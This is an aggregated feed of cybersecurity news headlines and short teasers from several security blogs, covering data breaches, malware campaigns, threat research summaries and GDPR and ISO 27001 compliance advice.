Biden’s order reflects the importance of cybersecurity at the highest levels – it is an issue of national security and should be treated as such.

One of the … (more…)

The post GUEST ESSAY: President Biden’s cybersecurity executive order is an issue of national security first appeared on The Last Watchdog.

News alert: Aembit announces speakers for NHIcon event, highlighting non-human identity security

Silver Spring, MD, Jan. 15, 2025, CyberNewswire — Aembit, the non-human identity and access management (IAM) company, unveiled the full agenda for NHIcon 2025, a virtual event dedicated to advancing non-human identity security, streaming live on Jan. 28 and … (more…)

The post News alert: Aembit announces speakers for NHIcon event, highlighting non-human identity security first appeared on The Last Watchdog.

News alert: Sweet Security’s LLM-powered detection engine reduces cloud noise to 0.04%

Tel Aviv, Israel, Jan. 15, 2025, CyberNewswire — Sweet Security, a leader in cloud runtime detection and response, today announced the launch of its groundbreaking patent-pending Large Language Model (LLM)-powered cloud detection engine.

This innovation enhances Sweet’s unified … (more…)

The post News alert: Sweet Security’s LLM-powered detection engine reduces cloud noise to 0.04% first appeared on The Last Watchdog.

News alert: Wultra secures €3M funding to help financial firms mitigate coming quantum threats

Prague, Czech Republic, Jan. 15, 2025, CyberNewswire — Quantum computing is set to revolutionize technology, but it also presents a significant security risk for financial institutions.

Czech cybersecurity startup Wultra has raised €3 million from Tensor Ventures, Elevator Ventures, and … (more…)

The post News alert: Wultra secures €3M funding to help financial firms mitigate coming quantum threats first appeared on The Last Watchdog.

News Alert: Security Risk Advisors joins Microsoft Intelligent Security Association (MISA)

Philadelphia, Pa., Jan. 7, 2025, CyberNewswire — Security Risk Advisors today announced it has become a member of the Microsoft Intelligent Security Association (MISA), an ecosystem of independent software vendors (ISVs) and managed security service providers (MSSPs) that have integrated … (more…)

The post News Alert: Security Risk Advisors joins Microsoft Intelligent Security Association (MISA) first appeared on The Last Watchdog.

News alert: CyTwist launches threat detection engine tuned to identify AI-driven malware in minutes

Ramat Gan, Israel, January 7th, 2025, CyberNewswire — CyTwist, a leader in advanced next-generation threat detection solutions, has launched its patented detection engine to combat the insidious rise of AI-generated malware.

The cybersecurity landscape is evolving as attackers harness … (more…)

The post News alert: CyTwist launches threat detection engine tuned to identify AI-driven malware in minutes first appeared on The Last Watchdog.

News alert: SquareX exposes OAuth attack on Chrome extensions — days before a major breach

Palo Alto, Calif., Dec. 30, 2024, CyberNewswire — SquareX, an industry-first Browser Detection and Response (BDR) solution, leads the way in browser security. About a week ago, SquareX reported large-scale attacks targeting Chrome Extension developers aimed at taking over … (more…)

The post News alert: SquareX exposes OAuth attack on Chrome extensions — days before a major breach first appeared on The Last Watchdog.

LW ROUNDTABLE: Predictive analytics, full-stack visualization to solidify cyber defenses in 2025

To wrap up our 2024 year-end roundtable, we turn our attention to new technologies and trends that are emerging to help bridge the gaps.

Part four of our four-part series

From cybersecurity skills shortages to the pressures of hybrid work, … (more…)

The post LW ROUNDTABLE:  Predictive analytics, full-stack visualization to solidify cyber defenses in 2025 first appeared on The Last Watchdog.

LW ROUNDTABLE: Compliance pressures intensify as new cybersecurity standards take hold

Today, part three of Last Watchdog’s year-end roundtable zeroes in on the regulatory and compliance landscape.

Part three of a four-part series

In 2024, global pressure on companies to implement advanced data protection measures intensified, with new standards in … (more…)

The post LW ROUNDTABLE: Compliance pressures intensify as new cybersecurity standards take hold first appeared on The Last Watchdog.

UnitedHealth almost doubles victim numbers from massive Change Healthcare data breach

UnitedHealth now estimates that 190 million people were affected by the massive Change Healthcare data breach nearly a year ago.

A week in security (January 20 – January 26)

Last week on Malwarebytes Labs: Last week on ThreatDown: Stay safe!

Three privacy rules for 2025 (Lock and Code S06E02)

This week on the Lock and Code podcast, host David Ruiz shares three privacy rules for 2025, and they're all about taking back control.

Texas scrutinizes four more car manufacturers on privacy issues

The Texas Attorney General has requested information from four more car manufacturers about their data handling.

Warning: Don’t sell or buy a second hand iPhone with TikTok already installed

iPhones are being offered for sale with TikTok installed after the US ban caused the app to disappear from the app stores.

7-Zip bug could allow a bypass of a Windows security feature. Update now

A vulnerability in 7-Zip that could allow attackers to bypass the MotW security feature in Windows has been patched.

AI tool GeoSpy analyzes images and identifies locations in seconds

Forget OSINT, AI-supported tool GeoSpy can determine a person's location based on their surroundings in a picture.

Your location or browsing habits could lead to price increases when buying online

Companies are showing customers different prices for the same goods and services based on what data they have on them, including details like their precise location or browser history.

A week in security (January 13 – January 19)

Last week on Malwarebytes Labs: Last week on ThreatDown: Stay safe!

WhatsApp spear phishing campaign uses QR codes to add device

A cybercriminal campaign linked to Russia is deploying QR codes to access the WhatsApp accounts of high-profile targets like journalists, members...

Avery had credit card skimmer stuck on its site for months

Avery has confirmed its website was compromised by a credit card skimmer that potentially affected over 60,000 customers.

PlugX malware deleted from thousands of systems by FBI

The FBI has announced it's deleted PlugX malware from approximately 4,258 US-based computers and networks.

The great Google Ads heist: criminals ransack advertiser accounts via fake Google ads

An ongoing malvertising campaign steals Google advertiser accounts via fraudulent ads for Google Ads itself.

Insurance company accused of using secret software to illegally collect and sell location data on millions of Americans

An insurance company is accused of unlawfully collecting, using, and selling location data from millions of people's cell phones.

The new rules for AI and encrypted messaging, with Mallory Knodel (Lock and Code S06E01)

This week on the Lock and Code podcast, we speak with Mallory Knodel about whether AI assistants are compatible with encrypted messaging apps.

iMessage text gets recipient to disable phishing protection so they can be phished

Smishing messages that come with instructions to bypass iMessage's protection against links are on the rise.

A week in security (January 6 – January 12)

A list of topics we covered in the week of January 6 to January 12 of 2025

BayMark Health Services sends breach notifications after ransomware attack

BayMark Health Services, Inc. notified an unknown number of patients that attackers stole their personal and health information.

Google Chrome AI extensions deliver info-stealing malware in broad attack

At least 36 Google Chrome extensions for AI and VPN tools have begun delivering info-stealing malware in a widespread attack.

Massive breach at location data seller: “Millions” of users affected

Data broker Gravy Analytics that collects location data and sells it to the US government has been breached.

What It Takes to Be Your Organisation’s DPO or Data Privacy Lead

‘GDPR’ has become a familiar term. We recognise the visible and consumer-facing aspects of the General Data Protection Regulation in our everyday lives – when consumers exercise their right to withdraw consent to their data being processed via ‘opt out’ or ‘unsubscribe’ buttons, for example. What’s less evident is whether organisations are keeping their practices fully up to date and in line with the GDPR and other applicable data protection laws. For instance: So, how sure are you that your organisation is fully compliant with the relevant data protection legislation? In this blog ‘Once compliant’ does not mean ‘still compliant’

The post What It Takes to Be Your Organisation’s DPO or Data Privacy Lead appeared first on IT Governance UK Blog.

Free Expert Insights: Index of Interviews

We regularly sit down with experts from within GRC International Group to get their insights on a technical topic or business area. Here are all our Q&As to date, grouped by broad topic: To get new expert insights straight to your inbox, sign up to our weekly newsletter, the Security Spotlight. Last updated: 15 January 2025. Interviews added: Andrew Pattison on DORA, how it compares to NIS 2, and how it’ll be regulated (DORA); Damian Garcia on transitioning to ISO 27001:2022 (ISO 27001); Louise Brooks on cookie audits (PECR); and Leon Teale on ethical hacking as a career (security testing). 

The post Free Expert Insights: Index of Interviews appeared first on IT Governance UK Blog.

How Can Organisations Transition to ISO 27001:2022?

Addressing the new Annex A control set Organisations with ISO/IEC 27001:2013 certification must transition to ISO/IEC 27001:2022 by 31 October 2025. The biggest change for organisations is Annex A, which has been overhauled and includes 11 new controls. How can organisations best approach this new control set? What changes to the main clauses of the Standard tend to get overlooked? And what are common mistakes to avoid when transitioning? Our head of GRC (governance, risk and compliance) consultancy, Damian Garcia, explains. In this interview Are the new controls in ISO 27001:2022 applicable? Where do organisations start when transitioning from ISO

The post How Can Organisations Transition to ISO 27001:2022? appeared first on IT Governance UK Blog.

The Benefits of Becoming an Ethical Hacker

Q&A with senior penetration tester Leon Teale Have you ever thought about getting paid to break into organisations’ networks? That’s precisely what ethical hackers (also known as ‘penetration testers’ or ‘pen testers’) do. But what exactly does this career involve? Why would you pursue it? And what knowledge and skills do you need to kick-start your career? We put these questions to our senior penetration tester Leon Teale, who’s been a qualified ethical hacker since 2012. In this interview Why pursue ethical hacking as a career What made you choose penetration testing as a career, and what do you enjoy

The post The Benefits of Becoming an Ethical Hacker appeared first on IT Governance UK Blog.

Step-by-Step Guide to Achieving GDPR Compliance

The data breaches that continue to make the headlines show the importance of data protection and laws like the GDPR (General Data Protection Regulation). If you’re only beginning to look at compliance, the Regulation may seem overwhelming. The good news is that many of the GDPR requirements reflect efficient business activities or practices – things that’ll help you as an organisation irrespective of compliance. This blog explains further, as we take you through eight steps towards becoming compliant with the GDPR and similar data protection laws. In this blog 1. Secure management buy-in Board or senior management support is a

The post Step-by-Step Guide to Achieving GDPR Compliance appeared first on IT Governance UK Blog.

How You Can Continually Improve Your ISO 27001 ISMS (Clause 10)

Your ISO 27001 journey doesn’t end once you’ve implemented your ISMS (information security management system) and controls. You must check your measures are doing what they’re supposed to do by: This reflects what you’re trying to address: information security risks. In this blog Your information security risks evolve over time All recent ISO management system standards, including ISO 27001:2022, require you to continually improve your management system. Risks evolve over time – particularly in a cyber security context. Cyber criminals are, unfortunately, innovative. They’re constantly coming up with new tools and exploits, meaning that organisations need to be pro-active about

The post How You Can Continually Improve Your ISO 27001 ISMS (Clause 10) appeared first on IT Governance UK Blog.

How ISO 27001 Helps You Comply With DORA

From 17 January 2025, DORA (Digital Operational Resilience Act) will, as an EU regulation, directly apply throughout the EU. Though the Regulation is primarily concerned with the operational resilience of critical and important functions of EU financial entities, UK organisations may also be in scope – particularly if they supply ICT services to EU financial institutions. As we conduct DORA gap analyses, we’ve noticed how the organisations with an ISO 27001 ISMS (information security management system) tend to have a higher degree of DORA compliance. In this blog How ISO 27001 helps with DORA compliance ISO 27001 provides the ‘building

The post How ISO 27001 Helps You Comply With DORA appeared first on IT Governance UK Blog.

Why You Need Cyber Resilience and Defence in Depth

And how to become resilient with ISO 27001 and ISO 22301

Unfortunately, even the most secure organisation can suffer an incident. The odds are simply stacked against you: While you need to protect all your assets from all types of threat, an attacker needs only one exploitable weakness to get into your systems. Plus, any security measure you implement is only designed to stop, at most, a handful of threats – and that’s assuming it was both correctly implemented and still doing its job. Regardless of implementation, single measures aren’t enough – because no measure is foolproof. The consequences of

The post Why You Need Cyber Resilience and Defence in Depth appeared first on IT Governance UK Blog.

How a GDPR Gap Analysis Helps Secure Support From Senior Management

GDPR gap analysis data shows compliance in the UK is “quite low”

When implementing a GDPR (General Data Protection Regulation) compliance programme, a key challenge is securing the required resources and support – particularly from top management. Yet GDPR compliance brings business benefits beyond mitigating the risk of data breaches and fines:

The value of a gap analysis

But how can you get management to understand these benefits, and more to the point, understand how far away the organisation is from compliance? GDPR gap analysis offers a useful tool here – particularly if conducted by an independent third party. A

The post How a GDPR Gap Analysis Helps Secure Support From Senior Management appeared first on IT Governance UK Blog.

How to Select Effective Security Controls

Risk–benefit analysis, defence in depth, information security objectives and proportionality

Looking to mitigate your information security risks but not sure how to choose effective controls while staying on budget? Risk–benefit analysis is key, as is defence in depth. You also want to set information security objectives that are aligned to your business objectives, and be proportionate in your control selections. Our head of GRC (governance, risk and compliance) consultancy, Damian Garcia, explains further.

In this interview

Risk–benefit analysis

How do you choose appropriate security controls?

You need to be clear on two things: Then hopefully, the benefit outweighs the risk.

The post How to Select Effective Security Controls appeared first on IT Governance UK Blog.

Mercedes-Benz Head Unit security research report

Kaspersky experts analyzed the Mercedes-Benz head unit, its IPC protocols and firmware, and found new vulnerabilities via physical access.

EAGERBEE, with updated and novel components, targets the Middle East

Kaspersky researchers analyze EAGERBEE backdoor modules, revealing a possible connection to the CoughingDown APT actor.

Threat landscape for industrial automation systems in Q3 2024

The ICS CERT quarterly report covers the threat landscape for industrial automation systems in Q3 2024.

Cloud Atlas seen using a new tool in its attacks

We analyze the latest activity by the Cloud Atlas gang. The attacks employ the PowerShower, VBShower and VBCloud modules to download victims' data with various PowerShell scripts.

BellaCPP: Discovering a new BellaCiao variant written in C++

While investigating an incident involving the BellaCiao .NET malware, Kaspersky researchers discovered a C++ version they dubbed "BellaCPP".

Attackers exploiting a patched FortiClient EMS vulnerability in the wild

Kaspersky's GERT experts describe an incident with initial access to enterprise infrastructures through a FortiClient EMS vulnerability that allowed SQL injections.

Lazarus group evolves its infection chain with old and new malware

Lazarus targets employees of a nuclear-related organization with a bunch of malware, such as MISTPEN, LPEClient, RollMid, CookieTime and a new modular backdoor CookiePlus.

Analysis of Cyber Anarchy Squad attacks targeting Russian and Belarusian organizations

Kaspersky experts analyze attacks by C.A.S, a cybergang that uses uncommon remote access Trojans and posts data about victims in public Telegram channels.

Download a banker to track your parcel

The Mamont banking trojan is spreading under the guise of a parcel-tracking app for fake stores claiming to offer goods at wholesale prices.

Dark web threats and dark market predictions for 2025

Kaspersky experts review dark market trends in 2024, such as the popularity of cryptors, loaders and crypto drainers on the dark web, and discuss what to expect in 2025.
